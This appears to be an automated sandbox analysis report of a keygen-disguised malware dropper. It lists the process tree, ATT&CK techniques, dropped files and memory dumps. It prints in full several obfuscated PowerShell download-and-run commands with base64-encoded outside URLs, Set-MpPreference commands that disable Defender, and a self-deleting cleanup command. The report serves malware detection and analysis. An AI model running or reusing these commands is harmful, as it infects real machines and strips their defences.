                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3956
                  • C:\Users\Public\ior.exe
                    "C:\Users\Public\ior.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4956
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                      6⤵
                        PID:4904
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Modifies registry class
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1540
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                            8⤵
                              PID:1056
                              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                9⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2552
                                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                  "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                  10⤵
                                  • Executes dropped EXE
                                  PID:4644
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                              "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                              8⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              PID:4704
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /pid 4704 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\192269194339792\\* & exit
                                9⤵
                                  PID:4840
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /pid 4704
                                    10⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2504
                          • C:\Users\Public\ior.exe
                            "C:\Users\Public\ior.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:4148
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\27E1.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4000
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2820
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 2
                      3⤵
                      • Delays execution with timeout.exe
                      PID:4028
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\27E1.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4304
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Blocklisted process makes network request
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4396
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\27E1.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4480
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4592
                • C:\Windows\SysWOW64\DllHost.exe
                  C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  1⤵
                    PID:5072
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c start C:\Windows\temp\voexdb1g.exe
                      2⤵
                        PID:2724
                        • C:\Windows\temp\voexdb1g.exe
                          C:\Windows\temp\voexdb1g.exe
                          3⤵
                          • Executes dropped EXE
                          PID:1888
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "powershell" Get-MpPreference -verbose
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4184
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5024
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4548
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4780
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4300
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:728
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4560
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4200
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5040
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2532
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4580
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4436
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2088
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /IM cmstp.exe /F
                        2⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3192

                    Network

                    MITRE ATT&CK Matrix ATT&CK v6

                    Persistence

                    Modify Existing Service

                    1
                    T1031

                    Defense Evasion

                    Modify Registry

                    2
                    T1112

                    Disabling Security Tools

                    2
                    T1089

                    Credential Access

                    Credentials in Files

                    3
                    T1081

                    Discovery

                    Query Registry

                    2
                    T1012

                    System Information Discovery

                    2
                    T1082

                    Collection

                    Data from Local System

                    3
                    T1005

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    • C:\Users\Admin\AppData\Local\Temp\27E1.tmp\Keygen.exe
                    • C:\Users\Admin\AppData\Local\Temp\27E1.tmp\Keygen.exe
                    • C:\Users\Admin\AppData\Local\Temp\27E1.tmp\b.hta
                    • C:\Users\Admin\AppData\Local\Temp\27E1.tmp\b1.hta
                    • C:\Users\Admin\AppData\Local\Temp\27E1.tmp\ba.hta
                    • C:\Users\Admin\AppData\Local\Temp\27E1.tmp\ba1.hta
                    • C:\Users\Admin\AppData\Local\Temp\27E1.tmp\m.hta
                    • C:\Users\Admin\AppData\Local\Temp\27E1.tmp\m1.hta
                    • C:\Users\Admin\AppData\Local\Temp\27E1.tmp\start.bat
                    • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\KXbXKRNNE0.exe
                    • C:\Users\Admin\AppData\Local\Temp\KXbXKRNNE0.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\bOdPECtxR2.exe
                    • C:\Users\Admin\AppData\Local\Temp\bOdPECtxR2.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hqHDIXswBx.exe
                    • C:\Users\Admin\AppData\Local\Temp\hqHDIXswBx.exe
                    • C:\Users\Admin\AppData\Local\Temp\m8Gmw1DwxY.exe
                      MD5

                      013db621a3351e3fb049efd2ccad79ff

                      SHA1

                      a23394ea54dbc5342a77938a2c285ee616185560

                      SHA256

                      df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                      SHA512

                      1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                    • C:\Users\Public\ior.exe
                    • C:\Users\Public\ior.exe
                    • C:\Users\Public\ior.exe
                    • C:\Users\Public\svp.exe
                    • C:\Users\Public\svp.exe
                    • C:\Users\Public\svp.exe
                    • C:\Windows\Temp\voexdb1g.exe
                      MD5

                      f4b5c1ebf4966256f52c4c4ceae87fb1

                      SHA1

                      ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                      SHA256

                      88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                      SHA512

                      02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                    • C:\Windows\temp\voexdb1g.exe
                      MD5

                      f4b5c1ebf4966256f52c4c4ceae87fb1

                      SHA1

                      ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                      SHA256

                      88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                      SHA512

                      02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                    • C:\Windows\temp\wajymyq5.inf
                    • \ProgramData\mozglue.dll
                    • \ProgramData\mozglue.dll
                    • \ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \ProgramData\sqlite3.dll
                    • \ProgramData\sqlite3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                      MD5

                      02cc7b8ee30056d5912de54f1bdfc219

                      SHA1

                      a6923da95705fb81e368ae48f93d28522ef552fb

                      SHA256

                      1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                      SHA512

                      0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                    • \Users\Admin\AppData\LocalLow\sqlite3.dll
                    • memory/196-23-0x00000000079A0000-0x00000000079A1000-memory.dmp
                      Filesize

                      4KB

                    • memory/196-15-0x0000000070B40000-0x000000007122E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/196-18-0x0000000007290000-0x0000000007291000-memory.dmp
                      Filesize

                      4KB

                    • memory/196-13-0x0000000000000000-mapping.dmp
                    • memory/728-337-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                      Filesize

                      9.9MB

                    • memory/728-330-0x0000000000000000-mapping.dmp
                    • memory/732-234-0x0000000000000000-mapping.dmp
                    • memory/732-399-0x0000000003C60000-0x0000000003CAC000-memory.dmp
                      Filesize

                      304KB

                    • memory/1056-182-0x0000000000000000-mapping.dmp
                    • memory/1224-246-0x0000000072EA0000-0x000000007358E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1224-248-0x00000000001E0000-0x00000000001E1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1224-259-0x000000000A240000-0x000000000A251000-memory.dmp
                      Filesize

                      68KB

                    • memory/1224-241-0x0000000000000000-mapping.dmp
                    • memory/1224-268-0x000000000ADA0000-0x000000000ADA3000-memory.dmp
                      Filesize

                      12KB

                    • memory/1224-251-0x00000000022E0000-0x00000000022E1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1304-0-0x0000000000000000-mapping.dmp
                    • memory/1540-174-0x0000000070B40000-0x000000007122E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1540-180-0x000000000AAE0000-0x000000000AB31000-memory.dmp
                      Filesize

                      324KB

                    • memory/1540-177-0x0000000002930000-0x0000000002931000-memory.dmp
                      Filesize

                      4KB

                    • memory/1540-175-0x0000000000650000-0x0000000000651000-memory.dmp
                      Filesize

                      4KB

                    • memory/1540-172-0x0000000000000000-mapping.dmp
                    • memory/1888-279-0x0000000000000000-mapping.dmp
                    • memory/1888-284-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                      Filesize

                      9.9MB

                    • memory/1888-280-0x0000000000000000-mapping.dmp
                    • memory/1888-286-0x0000000000A30000-0x0000000000A31000-memory.dmp
                      Filesize

                      4KB

                    • memory/2088-370-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                      Filesize

                      9.9MB

                    • memory/2088-356-0x0000000000000000-mapping.dmp
                    • memory/2172-266-0x00000000051C0000-0x00000000051C1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2172-264-0x00000000051C0000-0x00000000051C1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2172-258-0x0000000000000000-mapping.dmp
                    • memory/2236-7-0x0000000000000000-mapping.dmp
                    • memory/2308-27-0x00000000069C0000-0x00000000069C1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2308-14-0x0000000070B40000-0x000000007122E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2308-12-0x0000000000000000-mapping.dmp
                    • memory/2308-29-0x0000000006C40000-0x0000000006C41000-memory.dmp
                      Filesize

                      4KB

                    • memory/2308-30-0x0000000007370000-0x0000000007371000-memory.dmp
                      Filesize

                      4KB

                    • memory/2308-72-0x0000000009320000-0x0000000009321000-memory.dmp
                      Filesize

                      4KB

                    • memory/2308-75-0x00000000088D0000-0x00000000088D1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2308-31-0x0000000007500000-0x0000000007501000-memory.dmp
                      Filesize

                      4KB

                    • memory/2308-53-0x0000000007B80000-0x0000000007B81000-memory.dmp
                      Filesize

                      4KB

                    • memory/2308-50-0x0000000007CA0000-0x0000000007CA1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2308-48-0x0000000006C00000-0x0000000006C01000-memory.dmp
                      Filesize

                      4KB

                    • memory/2504-211-0x0000000000000000-mapping.dmp
                    • memory/2532-340-0x0000000000000000-mapping.dmp
                    • memory/2532-353-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                      Filesize

                      9.9MB

                    • memory/2552-193-0x0000000000060000-0x0000000000061000-memory.dmp
                      Filesize

                      4KB

                    • memory/2552-195-0x0000000000810000-0x0000000000811000-memory.dmp
                      Filesize

                      4KB

                    • memory/2552-192-0x0000000070B40000-0x000000007122E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2552-190-0x0000000000000000-mapping.dmp
                    • memory/2552-217-0x0000000004B40000-0x0000000004B64000-memory.dmp
                      Filesize

                      144KB

                    • memory/2632-170-0x0000000000000000-mapping.dmp
                    • memory/2688-9-0x0000000000000000-mapping.dmp
                    • memory/2724-274-0x0000000000000000-mapping.dmp
                    • memory/2820-37-0x0000000070B40000-0x000000007122E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2820-26-0x0000000000000000-mapping.dmp
                    • memory/2824-10-0x0000000000000000-mapping.dmp
                    • memory/3032-3-0x0000000000000000-mapping.dmp
                    • memory/3032-2-0x0000000000000000-mapping.dmp
                    • memory/3192-285-0x0000000000000000-mapping.dmp
                    • memory/3412-117-0x0000000000000000-mapping.dmp
                    • memory/3956-97-0x000000000A370000-0x000000000A371000-memory.dmp
                      Filesize

                      4KB

                    • memory/3956-94-0x00000000094E0000-0x00000000094E1000-memory.dmp
                      Filesize

                      4KB

                    • memory/3956-28-0x0000000070B40000-0x000000007122E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/3956-96-0x0000000008DA0000-0x0000000008DA1000-memory.dmp
                      Filesize

                      4KB

                    • memory/3956-25-0x0000000000000000-mapping.dmp
                    • memory/3976-17-0x0000000000000000-mapping.dmp
                    • memory/4000-21-0x0000000000000000-mapping.dmp
                    • memory/4028-22-0x0000000000000000-mapping.dmp
                    • memory/4104-242-0x0000000000000000-mapping.dmp
                    • memory/4148-166-0x0000000000400000-0x0000000000493000-memory.dmp
                      Filesize

                      588KB

                    • memory/4148-169-0x0000000000400000-0x0000000000493000-memory.dmp
                      Filesize

                      588KB

                    • memory/4148-167-0x000000000043FCC3-mapping.dmp
                    • memory/4184-305-0x000001F207060000-0x000001F207061000-memory.dmp
                      Filesize

                      4KB

                    • memory/4184-294-0x000001F2217B0000-0x000001F2217B1000-memory.dmp
                      Filesize

                      4KB

